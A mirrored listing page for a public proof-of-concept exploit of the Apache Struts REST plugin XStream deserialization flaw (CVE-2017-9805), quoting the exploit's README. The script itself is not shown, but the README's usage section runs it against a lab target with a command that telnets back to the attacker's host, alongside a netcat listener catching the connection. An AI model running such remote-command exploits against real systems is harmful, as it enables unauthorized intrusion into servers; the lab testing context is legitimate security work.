CVE-2017-9805 PoC — Apache Struts 代码问题漏洞

Source

https://github.com/0x00-0x00/-CVE-2017-9805

Associated Vulnerability

Title:Apache Struts 代码问题漏洞 (CVE-2017-9805)
Description:The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

Description

Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

Readme

# Vulnerability information
Resources: 
    * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

# What is this?
A python exploit script capable of executing remote commands into the shell of a system hosting a Struts2 vulnerable to S2-052. 

# Usage
╭─root@blackshell ~/  
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"
```bash
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
```

╭─zc00l@blackshell ~/  
╰─$ nc -lvp 1234
```bash
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned
```

Tested on pentesterlab vulnerable machine of exercise s2-052.

# Author rights
This exploit script was written by me (zc00l) and can be used by anyone.

In case you want to use or modify this script, please give the rightful credits for any work already done.

File Snapshot


 [4.0K]  /data/pocs/b5bf6763eb9405b77de2a02e6ad2bbe4e4c814ba
├── [1023]  README.md
└── [5.6K]  s2-052.py

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!